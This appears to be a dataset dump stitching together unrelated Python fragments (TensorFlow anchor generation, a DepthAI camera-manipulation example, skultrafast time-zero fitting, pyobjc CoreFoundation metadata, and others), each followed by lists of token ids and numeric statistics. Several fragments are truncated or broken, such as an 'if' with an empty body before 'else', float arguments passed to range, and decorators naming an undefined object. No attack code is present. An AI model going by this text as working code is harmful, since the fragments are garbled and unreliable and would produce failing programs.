for level in pyramid_levels:
stride_hh, stride_ww = feature_sizes[0][0] / feature_sizes[level][0], feature_sizes[0][1] / feature_sizes[level][1]
top, left = (0, 0) if grid_zero_start else (stride_hh / 2, stride_ww / 2)
hh_centers = tf.range(top, input_shape[0], stride_hh)
ww_centers = tf.range(left, input_shape[1], stride_ww)
ww_grid, hh_grid = tf.meshgrid(ww_centers, hh_centers)
grid = tf.reshape(tf.stack([hh_grid, ww_grid, hh_grid, ww_grid], 2), [-1, 1, 4])
anchors = tf.expand_dims(base_anchors * [stride_hh, stride_ww, stride_hh, stride_ww], 0) + tf.cast(grid, base_anchors.dtype)
anchors = tf.reshape(anchors, [-1, 4])
all_anchors.append(anchors)
all_anchors = tf.concat(all_anchors, axis=0) / [input_shape[0], input_shape[1], input_shape[0], input_shape[1]]
# if width_first:
# all_anchors = tf.gather(all_anchors, [1, 0, 3, 2], axis=-1)
return all_anchors
def corners_to_center_xywh_nd(ss):
""" input: [top, left, bottom, right], output: [center_h, center_w], [height, width] """
return (ss[:, :2] + ss[:, 2:]) * 0.5, ss[:, 2:] - ss[:, :2]
def get_image_aspect_aware_random_scale_crop(source_shape, target_shape, scale_min=0.1, scale_max=2.0):
""" https://github.com/google/automl/tree/master/efficientdet/dataloader.py#L67 """
random_image_scale = get_random_image_scale(source_shape, target_shape, scale_min, scale_max)
# Select non-zero random offset (x, y) if scaled image is larger than self._output_size.
height, width = tf.cast(source_shape[0], tf.float32), tf.cast(source_shape[1], tf.float32)
scaled_height, scaled_width = height * random_image_scale, width * random_image_scale
offset_y, offset_x = tf.maximum(0.0, scaled_height - target_shape[0]), tf.maximum(0.0, scaled_width - target_shape[1])
random_offset_y, random_offset_x = offset_y * tf.random.uniform([], 0, 1), offset_x * tf.random.uniform([], 0, 1)
random_offset_y, random_offset_x = tf.cast(random_offset_y, tf.int32), tf.cast(random_offset_x, tf.int32)
return random_image_scale, random_offset_y, random_offset_x
| [
11748,
11192,
273,
11125,
355,
48700,
198,
11748,
11192,
273,
11125,
62,
19608,
292,
1039,
355,
48700,
9310,
198,
6738,
11192,
273,
11125,
1330,
41927,
292,
198,
6738,
41927,
292,
62,
33967,
62,
1078,
1463,
62,
27530,
13,
320,
11286,
31... | 2.424748 | 2,279 |
# Generated by Django 3.0.3 on 2021-03-22 08:32
from django.db import migrations, models
import django.utils.timezone
| [
2,
2980,
515,
416,
37770,
513,
13,
15,
13,
18,
319,
33448,
12,
3070,
12,
1828,
8487,
25,
2624,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
198,
11748,
42625,
14208,
13,
26791,
13,
2435,
11340,
628
] | 2.926829 | 41 |
#!/usr/bin/env python3
"""
This example shows usage of ImageManip to crop a rotated rectangle area on a frame,
or perform various image transforms: rotate, mirror, flip, perspective transform.
"""
import depthai as dai
import cv2
import numpy as np
keyRotateDecr = 'z'
keyRotateIncr = 'x'
keyResizeInc = 'v'
keyWarpTestCycle = 'c'
rotateRateMax = 5.0
rotateRateInc = 0.1
resizeMaxW = 800
resizeMaxH = 600
resizeFactorMax = 5
'''
The crop points are specified in clockwise order,
with first point mapped to output top-left, as:
P0 -> P1
^ v
P3 <- P2
'''
P0 = [0, 0] # top-left
P1 = [1, 0] # top-right
P2 = [1, 1] # bottom-right
P3 = [0, 1] # bottom-left
warpList = [
# points order, normalized cordinates, description
# [[[0, 0], [1, 0], [1, 1], [0, 1]], True, "passthrough"],
# [[[0, 0], [639, 0], [639, 479], [0, 479]], False, "passthrough (pixels)"],
[[P0, P1, P2, P3], True, "1. passthrough"],
[[P3, P0, P1, P2], True, "2. rotate 90"],
[[P2, P3, P0, P1], True, "3. rotate 180"],
[[P1, P2, P3, P0], True, "4. rotate 270"],
[[P1, P0, P3, P2], True, "5. horizontal mirror"],
[[P3, P2, P1, P0], True, "6. vertical flip"],
[[[-0.1, -0.1], [1.1, -0.1], [1.1, 1.1], [-0.1, 1.1]], True, "7. add black borders"],
[[[-0.3, 0], [1, 0], [1.3, 1], [0, 1]], True, "8. parallelogram transform"],
[[[-0.2, 0], [1.8, 0], [1, 1], [0, 1]], True, "9. trapezoid transform"],
]
# Create pipeline
pipeline = dai.Pipeline()
# Define sources and outputs
camRgb = pipeline.createColorCamera()
manip = pipeline.createImageManip()
camOut = pipeline.createXLinkOut()
manipOut = pipeline.createXLinkOut()
manipCfg = pipeline.createXLinkIn()
camOut.setStreamName("preview")
manipOut.setStreamName("manip")
manipCfg.setStreamName("manipCfg")
# Properties
camRgb.setPreviewSize(640, 480)
camRgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
camRgb.setInterleaved(False)
camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)
manip.setMaxOutputFrameSize(2000 * 1500 * 3)
# Linking
camRgb.preview.link(camOut.input)
camRgb.preview.link(manip.inputImage)
manip.out.link(manipOut.input)
manipCfg.out.link(manip.inputConfig)
# Connect to device and start pipeline
with dai.Device(pipeline) as device:
# Create input & output queues
qPreview = device.getOutputQueue(name="preview", maxSize=4)
qManip = device.getOutputQueue(name="manip", maxSize=4)
qManipCfg = device.getInputQueue(name="manipCfg")
key = -1
angleDeg = 0
rotateRate = 1.0
resizeFactor = 0
resizeX = 0
resizeY = 0
testFourPt = False
warpIdx = -1
printControls()
while key != ord('q'):
if key > 0:
print("Pressed: ", key)
if key == ord(keyRotateDecr) or key == ord(keyRotateIncr):
if key == ord(keyRotateDecr):
if rotateRate > -rotateRateMax:
rotateRate -= rotateRateInc
if key == ord(keyRotateIncr):
if rotateRate < rotateRateMax:
rotateRate += rotateRateInc
testFourPt = False
print("Crop rotated rectangle, rate per frame: {:.1f} degrees".format(rotateRate))
elif key == ord(keyResizeInc):
resizeFactor += 1
if resizeFactor > resizeFactorMax:
resizeFactor = 0
print("Crop region not resized")
else:
resizeX = resizeMaxW // resizeFactor
resizeY = resizeMaxH // resizeFactor
print("Crop region resized to: ", resizeX, 'x', resizeY)
elif key == ord(keyWarpTestCycle):
# Disable resizing initially
resizeFactor = 0
warpIdx = (warpIdx + 1) % len(warpList)
testFourPt = True
testDescription = warpList[warpIdx][2]
print("Warp 4-point transform: ", testDescription)
elif key == ord('h'):
printControls()
# Send an updated config with continuous rotate, or after a key press
if key >= 0 or (not testFourPt and abs(rotateRate) > 0.0001):
cfg = dai.ImageManipConfig()
if testFourPt:
test = warpList[warpIdx]
points, normalized = test[0], test[1]
point2fList = []
for p in points:
pt = dai.Point2f()
pt.x, pt.y = p[0], p[1]
point2fList.append(pt)
cfg.setWarpTransformFourPoints(point2fList, normalized)
else:
angleDeg += rotateRate
rotatedRect = ((320, 240), (400, 400), angleDeg)
rr = dai.RotatedRect()
rr.center.x, rr.center.y = rotatedRect[0]
rr.size.width, rr.size.height = rotatedRect[1]
rr.angle = rotatedRect[2]
cfg.setCropRotatedRect(rr, False)
if resizeFactor > 0:
cfg.setResize(resizeX, resizeY)
# cfg.setWarpBorderFillColor(255, 0, 0)
# cfg.setWarpBorderReplicatePixels()
qManipCfg.send(cfg)
for q in [qPreview, qManip]:
pkt = q.get()
name = q.getName()
shape = (3, pkt.getHeight(), pkt.getWidth())
frame = pkt.getCvFrame()
if name == "preview" and not testFourPt:
# Draw RotatedRect cropped area on input frame
points = np.int0(cv2.boxPoints(rotatedRect))
cv2.drawContours(frame, [points], 0, (255, 0, 0), 1)
# Mark top-left corner
cv2.circle(frame, tuple(points[1]), 10, (255, 0, 0), 2)
cv2.imshow(name, frame)
key = cv2.waitKey(1)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
37811,
198,
1212,
1672,
2523,
8748,
286,
7412,
5124,
541,
284,
13833,
257,
38375,
35991,
1989,
319,
257,
5739,
11,
198,
273,
1620,
2972,
2939,
31408,
25,
23064,
11,
10162,
11,... | 2.025216 | 2,895 |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import json
import azure.functions as func
| [
2,
15069,
357,
66,
8,
5413,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
49962,
739,
262,
17168,
13789,
13,
198,
11748,
33918,
198,
11748,
35560,
495,
13,
12543,
2733,
355,
25439,
628
] | 4.181818 | 33 |
from functools import partial
from lazy import lazy
from ploy.common import BaseMaster, BaseInstance
from ploy.common import SSHKeyFingerprint
from ploy.common import SSHKeyFingerprintAsk
from ploy.common import SSHKeyFingerprintIgnore
from ploy.common import SSHKeyFingerprintInstance
from ploy.common import SSHKeyInfo
from ploy.common import import_paramiko
from ploy.common import parse_fingerprint, parse_ssh_keygen
import getpass
import hashlib
import logging
import os
import re
import socket
import subprocess
import sys
log = logging.getLogger('ploy')
plugin = dict(
get_massagers=get_massagers,
get_masters=get_masters)
| [
6738,
1257,
310,
10141,
1330,
13027,
198,
6738,
16931,
1330,
16931,
198,
6738,
46945,
13,
11321,
1330,
7308,
18254,
11,
7308,
33384,
198,
6738,
46945,
13,
11321,
1330,
33825,
9218,
37,
3889,
4798,
198,
6738,
46945,
13,
11321,
1330,
33825,... | 3.565934 | 182 |
# -*- coding: utf-8 -*-
"""
Contains functions to find the time-zero and to interpolate the data.
"""
import numpy as np
import skultrafast.dv as dv
import scipy.ndimage as nd
import matplotlib.pyplot as plt
#from skultrafast.fitter import _coh_gaussian
from scipy.linalg import lstsq
from scipy.optimize import least_squares
@dv.add_to_cls(est)
def use_gaussian(dat, sigma=1):
"""
Use convolution with the derivate of an gaussian.
"""
derivate = nd.gaussian_filter(dat, (sigma, 0), 1)
return np.argmax(np.abs(derivate), 0)
@dv.add_to_cls(est)
def use_diff(dat, smooth=0):
"""
Use numerical diff.
"""
if smooth != 0:
dat = nd.gaussian_filter(dat, smooth)
derivate = np.diff(dat, 1, 0)
return np.argmax(np.abs(derivate), 0)
@dv.add_to_cls(est)
def use_sv_filter(dat, window=7, polydeg=5):
"""
Use savitzky-golay derivate.
"""
out = np.zeros((dat.shape[1]))
for i in range(dat.shape[1]):
idx = np.argmax(dv.savitzky_golay(dat[:, i], window, polydeg, 1))
out[i] = idx
return out
@dv.add_to_cls(est)
def use_max(dat, use_abs=True):
"""
Uses the absolute maximum of the signal
"""
if use_abs:
dat = np.abs(dat)
return np.argmax(dat, 0)
@dv.add_to_cls(est)
def use_first_abs(dat, val=5):
"""
Returns the first index where abs(dat)>val.
"""
idx = np.abs(dat) > val
return np.argmax(idx, 0)
import scipy.optimize as opt
@dv.add_to_cls(est)
def use_fit(dat, t, tau=[5, 20000], w0=0.08, tn=None, n=-1):
"""
Fits each transient with only w and x0 free.
"""
out = np.zeros(dat.shape[1])
w_out = np.zeros(dat.shape[1])
t = t[:n]
o = tn[0]
w = w0
for i in range(dat.shape[1]):
y = dat[:n, i]
f = lambda p: _fit_func(t, y, -p[0], p[1], tau)
f_sum = lambda p: (f(p)**2).sum()
try:
if not np.isnan(o) and False:
k = o + np.diff(tn)[i]
else:
k = tn[i]
w = w0
#o, w = leastsq(f, list([k, w0]))[0][:2]
# = opt.minimize(f_sum, [k,w], method='BFGS')
#x = cma.fmin(f_sum, [o, w0], 0.03, bounds=[(0,0.04),(5, 0.2)], restarts=1, verb_log=0)
x = opt.brute(f_sum, (range((tn - 0.1),
(tn + 0.1), 0.01), np.range(0.04, 0.13, 0.01)))
o, w = x[0]
if abs(o - tn[i]) > 0.04:
plt.plot(t, f([o, w]) + y)
plt.plot(t, y, 'o')
except NameError:
o = w = np.NaN
out[i] = o
w_out[i] = w
return out, w_out
def _fit_func(t, y, x0, w, tau):
"""
Fit
"""
base = np.column_stack((
_fold_exp(t, w, x0, np.array(tau)).T, #))
_coh_gaussian(t, w, x0)))
base = np.nan_to_num(base)
c = lstsq(base, y[:, None])
y_fit = np.dot(base, c[0])
return (y_fit[:, 0] - y)
def robust_fit_tz(wl, tn, degree=3, t=1.345):
"""
Apply a robust 3-degree fit to given tn-indexs.
"""
powers = np.arange(degree + 1)
X = wl[:, None]**powers[None, :]
c = np.linalg.lstsq(X, tn, rcond=1e-10)[0]
o = least_squares(fit_func, c, loss='cauchy')
zeros = X @ o.x
return zeros, o.x[::-1]
def interpol(tup, tn, shift=0., new_t=None):
"""
Uses linear interpolation to shift each channcel by given tn.
"""
dat = tup.data
t = tup.t
if new_t is None:
new_t = t
#t_array = np.tile(t.reshape(t.size, 1), (1, dat.shape[1]))
t_array = t[:, None] - tn[None, :]
t_array -= shift
dat_new = np.zeros((new_t.size, dat.shape[1]))
for i in range(dat.shape[1]):
dat_new[:, i] = np.interp(new_t, t_array[:, i], dat[:, i], left=0)
return dv.tup(tup.wl, t, dat_new)
def get_tz_cor(tup, method=use_diff, deg=3, plot=False, **kwargs):
"""
Fully automatic timezero correction.
"""
idx = method(tup.data, **kwargs)
raw_tn = tup.t[idx]
no_nan = ~np.any(np.isnan(tup.data), 0)
fit, p = robust_fit_tz(tup.wl[no_nan], raw_tn[no_nan], deg)
#dv.subtract_background(tup.data, tup.t, fit, 400)
fit = np.polyval(p, tup.wl)
cor = interpol(tup, fit)
if plot:
from . import plot_funcs as pl
pl._plot_zero_finding(tup, raw_tn, fit, cor)
return cor, fit
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
4264,
1299,
5499,
284,
1064,
262,
640,
12,
22570,
290,
284,
39555,
378,
262,
1366,
13,
198,
37811,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
1341,... | 1.891068 | 2,295 |
#######################################################################
# Tests for cmpdirs.py
#######################################################################
import unittest
import os
import tempfile
import shutil
from bcftbx.Md5sum import Md5Checker
from bcftbx.test.mock_data import TestUtils,ExampleDirLanguages
from cmpdirs import yield_filepairs
from cmpdirs import cmp_filepair
from cmpdirs import cmp_dirs
| [
29113,
29113,
4242,
21017,
198,
2,
30307,
329,
269,
3149,
15908,
82,
13,
9078,
198,
29113,
29113,
4242,
21017,
198,
198,
11748,
555,
715,
395,
198,
11748,
28686,
198,
11748,
20218,
7753,
198,
11748,
4423,
346,
198,
6738,
47125,
701,
65,... | 3.81982 | 111 |
from rubicon.repository.utils.slugify import slugify
__all__ = ["slugify"]
| [
6738,
6437,
4749,
13,
260,
1930,
37765,
13,
26791,
13,
6649,
1018,
1958,
1330,
31065,
1958,
198,
198,
834,
439,
834,
796,
14631,
6649,
1018,
1958,
8973,
198
] | 2.714286 | 28 |
#!/bin/python
import sys, numpy, os.path, re
import argparse
from Bio import SeqIO
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--library_file', help="File containing the library report generated by the script prepare_libraries.py")
parser.add_argument('-p', '--path', required=True, help="Path de Trimmomatic")
parser.add_argument('-j', '--job_output', required=True, help="This is where the script will create the job file")
parser.add_argument('-o', '--output', required=True, help="This where the job file will point for the output of trimmomatic")
parser.add_argument('-c', '--commands', default='LEADING:3 TRAILING:3 SLIDINGWINDOW:4:15 MINLEN:36', help='User defined commands for trimmomatic')
parser.add_argument('--remove_originals', action='store_true', default=False, help='After trimming the libraries it deletes the original untrimmed files. This option is off by default.')
args = parser.parse_args()
trimming (args.library_file, args.path, args.commands, args.job_output, args.output, args.remove_originals)
#for i in pacbio_list:
| [
2,
48443,
8800,
14,
29412,
198,
11748,
25064,
11,
299,
32152,
11,
28686,
13,
6978,
11,
302,
198,
11748,
1822,
29572,
198,
6738,
16024,
1330,
1001,
80,
9399,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,... | 3.116343 | 361 |
# -*- coding: utf-8 -*-
# @Author: amaneureka
# @Date: 2017-03-30 13:53:13
# @Last Modified by: amaneureka
# @Last Modified time: 2017-03-30 22:10:02
from dateutil import parser
from .. import app
@app.template_filter('strftime')
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
2488,
13838,
25,
716,
1531,
495,
4914,
198,
2,
2488,
10430,
25,
220,
220,
2177,
12,
3070,
12,
1270,
1511,
25,
4310,
25,
1485,
198,
2,
2488,
5956,
40499,
416,
25,
... | 2.510638 | 94 |
import argparse
if __name__ == "__main__":
myCli = EnjCLI()
myvars = myCli.create_parser()
print(myvars) | [
11748,
1822,
29572,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
616,
2601,
72,
796,
2039,
73,
5097,
40,
3419,
198,
220,
220,
220,
616,
85,
945,
796,
616,
2601,
72,
13,
17953,
62,
48610,
3... | 2.166667 | 54 |
from unittest import TestCase
from unittest.mock import patch
with patch('serial.Serial'):
from controls.valloxcontrol import ValloxControl
from valloxserial import vallox_serial
| [
6738,
555,
715,
395,
1330,
6208,
20448,
198,
6738,
555,
715,
395,
13,
76,
735,
1330,
8529,
198,
4480,
8529,
10786,
46911,
13,
32634,
6,
2599,
198,
220,
220,
220,
422,
6973,
13,
85,
439,
1140,
13716,
1330,
46929,
1140,
15988,
198,
67... | 3.407407 | 54 |
"""
Simple lock interface.
"""
import os
import time
from dataclasses import dataclass
from pathlib import Path
from fasteners import InterProcessLock
from dataladmetadatamodel.log import logger
PID = os.getpid()
GIT_MAPPER_LOCK_FILE_NAME = "metadata-model-git.lock"
read_write_locked = dict()
@dataclass
| [
37811,
198,
26437,
5793,
7071,
13,
198,
37811,
198,
11748,
28686,
198,
11748,
640,
198,
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
198,
6738,
3108,
8019,
1330,
10644,
198,
198,
6738,
3049,
36014,
1330,
4225,
18709,
25392,
198,
198,
... | 3.009524 | 105 |
import argparse
import sys
import csv
import os
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
BATCH = 1
NUM_GENES = 4
N1 = 91
EXPLICIT_NOISE_LEVEL = 0.05
FLAGS = None
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--output_name', type=int, default=1, help='***')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| [
11748,
1822,
29572,
198,
11748,
25064,
198,
11748,
269,
21370,
198,
11748,
28686,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
11192,
273,
11125,
355,
48700,
628,
198,
33,
... | 2.60119 | 168 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from tkinter import Tk, Text, BOTH, DISABLED, NORMAL, END
APPNAME = "WRITER TEST"
WELCOME_MSG = "Welcome to {}\n".format(APPNAME)
ui = UI() | [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
256,
74,
3849,
1330,
309,
74,
11,
8255,
11,
347,
26946,
11,
13954,
6242,
30465,
11,
25273,
42126,
11,
23578,
198,... | 2.190476 | 84 |
# This file is generated by objective.metadata
#
# Last update: Mon Mar 16 08:52:15 2020
#
# flake8: noqa
import objc, sys
if sys.maxsize > 2 ** 32:
else:
misc = {}
misc.update(
{
"CFXMLEntityInfo": objc.createStructType(
"CFXMLEntityInfo",
sel32or64(
b"{_CFXMLEntityInfo=l^{__CFString=}{_CFXMLExternalID=^{__CFURL=}^{__CFString=}}^{__CFString=}}",
b"{_CFXMLEntityInfo=q^{__CFString=}{_CFXMLExternalID=^{__CFURL=}^{__CFString=}}^{__CFString=}}",
),
["entityType", "replacementText", "entityID", "notationName"],
),
"CFXMLElementInfo": objc.createStructType(
"CFXMLElementInfo",
b"{_CFXMLElementInfo=^{__CFDictionary=}^{__CFArray=}Z[3c]}",
["attributes", "attributeOrder", "isEmpty", "_reserved"],
),
"CFXMLAttributeListDeclarationInfo": objc.createStructType(
"CFXMLAttributeListDeclarationInfo",
sel32or64(
b"{_CFXMLAttributeListDeclarationInfo=l^{_CFXMLAttributeDeclarationInfo=^{__CFString=}^{__CFString=}^{__CFString=}}}",
b"{_CFXMLAttributeListDeclarationInfo=q^{_CFXMLAttributeDeclarationInfo=^{__CFString=}^{__CFString=}^{__CFString=}}}",
),
["numberOfAttributes", "attributes"],
),
"CFXMLElementTypeDeclarationInfo": objc.createStructType(
"CFXMLElementTypeDeclarationInfo",
b"{_CFXMLElementTypeDeclarationInfo=^{__CFString=}}",
["contentDescription"],
),
"CFGregorianDate": objc.createStructType(
"CFGregorianDate",
sel32or64(b"{_CFGregorianDate=lccccd}", b"{_CFGregorianDate=iccccd}"),
["year", "month", "day", "hour", "minute", "second"],
),
"CFXMLExternalID": objc.createStructType(
"CFXMLExternalID",
b"{_CFXMLExternalID=^{__CFURL=}^{__CFString=}}",
["systemID", "publicID"],
),
"CFUUIDBytes": objc.createStructType(
"CFUUIDBytes",
b"{_CFUUIDBytes=CCCCCCCCCCCCCCCC}",
[
"byte0",
"byte1",
"byte2",
"byte3",
"byte4",
"byte5",
"byte6",
"byte7",
"byte8",
"byte9",
"byte10",
"byte11",
"byte12",
"byte13",
"byte14",
"byte15",
],
),
"CFXMLAttributeDeclarationInfo": objc.createStructType(
"CFXMLAttributeDeclarationInfo",
b"{_CFXMLAttributeDeclarationInfo=^{__CFString=}^{__CFString=}^{__CFString=}}",
["attributeName", "typeString", "defaultString"],
),
"CFSwappedFloat32": objc.createStructType(
"CFSwappedFloat32", b"{_CFSwappedFloat32=I}", ["v"]
),
"CFSwappedFloat64": objc.createStructType(
"CFSwappedFloat64", b"{_CFSwappedFloat64=Q}", ["v"]
),
"CFXMLDocumentTypeInfo": objc.createStructType(
"CFXMLDocumentTypeInfo",
b"{_CFXMLDocumentTypeInfo={_CFXMLExternalID=^{__CFURL=}^{__CFString=}}}",
["externalID"],
),
"CFStreamError": objc.createStructType(
"CFStreamError",
sel32or64(b"{_CFStreamError=ll}", b"{_CFStreamError=qi}"),
["domain", "error"],
),
"CFXMLEntityReferenceInfo": objc.createStructType(
"CFXMLEntityReferenceInfo",
sel32or64(
b"{_CFXMLEntityReferenceInfo=l}", b"{_CFXMLEntityReferenceInfo=q}"
),
["entityType"],
),
"CFXMLProcessingInstructionInfo": objc.createStructType(
"CFXMLProcessingInstructionInfo",
b"{_CFXMLProcessingInstructionInfo=^{__CFString=}}",
["dataString"],
),
"CFRange": objc.createStructType(
"CFRange",
sel32or64(b"{_CFRange=ll}", b"{_CFRange=qq}"),
["location", "length"],
),
"CFSocketSignature": objc.createStructType(
"CFSocketSignature",
sel32or64(
b"{_CFSocketSignature=lll^{__CFData=}}",
b"{_CFSocketSignature=iii^{__CFData=}}",
),
["protocolFamily", "socketType", "protocol", "address"],
),
"CFXMLDocumentInfo": objc.createStructType(
"CFXMLDocumentInfo",
sel32or64(
b"{_CFXMLDocumentInfo=^{__CFURL=}L}",
b"{_CFXMLDocumentInfo=^{__CFURL=}I}",
),
["sourceURL", "encoding"],
),
"CFGregorianUnits": objc.createStructType(
"CFGregorianUnits",
sel32or64(b"{_CFGregorianUnits=llllld}", b"{_CFGregorianUnits=iiiiid}"),
["years", "months", "days", "hours", "minutes", "seconds"],
),
"CFXMLNotationInfo": objc.createStructType(
"CFXMLNotationInfo",
b"{_CFXMLNotationInfo={_CFXMLExternalID=^{__CFURL=}^{__CFString=}}}",
["externalID"],
),
}
)
constants = """$kCFAbsoluteTimeIntervalSince1904@d$kCFAbsoluteTimeIntervalSince1970@d$kCFAllocatorDefault@^{__CFAllocator=}$kCFAllocatorMalloc@^{__CFAllocator=}$kCFAllocatorMallocZone@^{__CFAllocator=}$kCFAllocatorNull@^{__CFAllocator=}$kCFAllocatorSystemDefault@^{__CFAllocator=}$kCFAllocatorUseContext@^{__CFAllocator=}$kCFBooleanFalse@^{__CFBoolean=}$kCFBooleanTrue@^{__CFBoolean=}$kCFBuddhistCalendar@^{__CFString=}$kCFBundleDevelopmentRegionKey@^{__CFString=}$kCFBundleExecutableKey@^{__CFString=}$kCFBundleIdentifierKey@^{__CFString=}$kCFBundleInfoDictionaryVersionKey@^{__CFString=}$kCFBundleLocalizationsKey@^{__CFString=}$kCFBundleNameKey@^{__CFString=}$kCFBundleVersionKey@^{__CFString=}$kCFChineseCalendar@^{__CFString=}$kCFCoreFoundationVersionNumber@d$kCFDateFormatterAMSymbol@^{__CFString=}$kCFDateFormatterCalendar@^{__CFString=}$kCFDateFormatterCalendarName@^{__CFString=}$kCFDateFormatterDefaultDate@^{__CFString=}$kCFDateFormatterDefaultFormat@^{__CFString=}$kCFDateFormatterDoesRelativeDateFormattingKey@^{__CFString=}$kCFDateFormatterEraSymbols@^{__CFString=}$kCFDateFormatterGregorianStartDate@^{__CFString=}$kCFDateFormatterIsLenient@^{__CFString=}$kCFDateFormatterLongEraSymbols@^{__CFString=}$kCFDateFormatterMonthSymbols@^{__CFString=}$kCFDateFormatterPMSymbol@^{__CFString=}$kCFDateFormatterQuarterSymbols@^{__CFString=}$kCFDateFormatterShortMonthSymbols@^{__CFString=}$kCFDateFormatterShortQuarterSymbols@^{__CFString=}$kCFDateFormatterShortStandaloneMonthSymbols@^{__CFString=}$kCFDateFormatterShortStandaloneQuarterSymbols@^{__CFString=}$kCFDateFormatterShortStandaloneWeekdaySymbols@^{__CFString=}$kCFDateFormatterShortWeekdaySymbols@^{__CFString=}$kCFDateFormatterStandaloneMonthSymbols@^{__CFString=}$kCFDateFormatterStandaloneQuarterSymbols@^{__CFString=}$kCFDateFormatterStandaloneWeekdaySymbols@^{__CFString=}$kCFDateFormatterTimeZone@^{__CFString=}$kCFDateFormatterTwoDigitStartDate@^{__CFString=}$kCFDateFormatterVeryShortMonthSymbols@^{__CFString=}$kCFDateFormatterVeryShortStandaloneMonthSymbols@^{__CFString=}$kCFDateFormatterVeryShortStandaloneWeekdaySymbols@^{__CFString=}$kCFDateFormatterVeryShortWeekdaySymbols@^{__CFString=}$kCFDateFormatterWeekdaySymbols@^{__CFString=}$kCFErrorDescriptionKey@^{__CFString=}$kCFErrorDomainCocoa@^{__CFString=}$kCFErrorDomainMach@^{__CFString=}$kCFErrorDomainOSStatus@^{__CFString=}$kCFErrorDomainPOSIX@^{__CFString=}$kCFErrorFilePathKey@^{__CFString=}$kCFErrorLocalizedDescriptionKey@^{__CFString=}$kCFErrorLocalizedFailureKey@^{__CFString=}$kCFErrorLocalizedFailureReasonKey@^{__CFString=}$kCFErrorLocalizedRecoverySuggestionKey@^{__CFString=}$kCFErrorURLKey@^{__CFString=}$kCFErrorUnderlyingErrorKey@^{__CFString=}$kCFGregorianCalendar@^{__CFString=}$kCFHebrewCalendar@^{__CFString=}$kCFISO8601Calendar@^{__CFString=}$kCFIndianCalendar@^{__CFString=}$kCFIslamicCalendar@^{__CFString=}$kCFIslamicCivilCalendar@^{__CFString=}$kCFIslamicTabularCalendar@^{__CFString=}$kCFIslamicUmmAlQuraCalendar@^{__CFString=}$kCFJapaneseCalendar@^{__CFString=}$kCFLocaleAlternateQuotationBeginDelimiterKey@^{__CFString=}$kCFLocaleAlternateQuotationEndDelimiterKey@^{__CFString=}$kCFLocaleCalendar@^{__CFString=}$kCFLocaleCalendarIdentifier@^{__CFString=}$kCFLocaleCollationIdentifier@^{__CFString=}$kCFLocaleCollatorIdentifier@^{__CFString=}$kCFLocaleCountryCode@^{__CFString=}$kCFLocaleCountryCodeKey$kCFLocaleCurrencyCode@^{__CFString=}$kCFLocaleCurrencySymbol@^{__CFString=}$kCFLocaleCurrentLocaleDidChangeNotification@^{__CFString=}$kCFLocaleDecimalSeparator@^{__CFString=}$kCFLocaleExemplarCharacterSet@^{__CFString=}$kCFLocaleGroupingSeparator@^{__CFString=}$kCFLocaleIdentifier@^{__CFString=}$kCFLocaleLanguageCode@^{__CFString=}$kCFLocaleLanguageCodeKey$kCFLocaleMeasurementSystem@^{__CFString=}$kCFLocaleQuotationBeginDelimiterKey@^{__CFString=}$kCFLocaleQuotationEndDelimiterKey@^{__CFString=}$kCFLocaleScriptCode@^{__CFString=}$kCFLocaleUsesMetricSystem@^{__CFString=}$kCFLocaleVariantCode@^{__CFString=}$kCFNull@^{__CFNull=}$kCFNumberFormatterAlwaysShowDecimalSeparator@^{__CFString=}$kCFNumberFormatterCurrencyCode@^{__CFString=}$kCFNumberFormatterCurrencyDecimalSeparator@^{__CFString=}$kCFNumberFormatterCurrencyGroupingSeparator@^{__CFString=}$kCFNumberFormatterCurrencySymbol@^{__CFString=}$kCFNumberFormatterDecimalSeparator@^{__CFString=}$kCFNumberFormatterDefaultFormat@^{__CFString=}$kCFNumberFormatterExponentSymbol@^{__CFString=}$kCFNumberFormatterFormatWidth@^{__CFString=}$kCFNumberFormatterGroupingSeparator@^{__CFString=}$kCFNumberFormatterGroupingSize@^{__CFString=}$kCFNumberFormatterInfinitySymbol@^{__CFString=}$kCFNumberFormatterInternationalCurrencySymbol@^{__CFString=}$kCFNumberFormatterIsLenient@^{__CFString=}$kCFNumberFormatterMaxFractionDigits@^{__CFString=}$kCFNumberFormatterMaxIntegerDigits@^{__CFString=}$kCFNumberFormatterMaxSignificantDigits@^{__CFString=}$kCFNumberFormatterMinFractionDigits@^{__CFString=}$kCFNumberFormatterMinIntegerDigits@^{__CFString=}$kCFNumberFormatterMinSignificantDigits@^{__CFString=}$kCFNumberFormatterMinusSign@^{__CFString=}$kCFNumberFormatterMultiplier@^{__CFString=}$kCFNumberFormatterNaNSymbol@^{__CFString=}$kCFNumberFormatterNegativePrefix@^{__CFString=}$kCFNumberFormatterNegativeSuffix@^{__CFString=}$kCFNumberFormatterPaddingCharacter@^{__CFString=}$kCFNumberFormatterPaddingPosition@^{__CFString=}$kCFNumberFormatterPerMillSymbol@^{__CFString=}$kCFNumberFormatterPercentSymbol@^{__CFString=}$kCFNumberFormatterPlusSign@^{__CFString=}$kCFNumberFormatterPositivePrefix@^{__CFString=}$kCFNumberFormatterPositiveSuffix@^{__CFString=}$kCFNumberFormat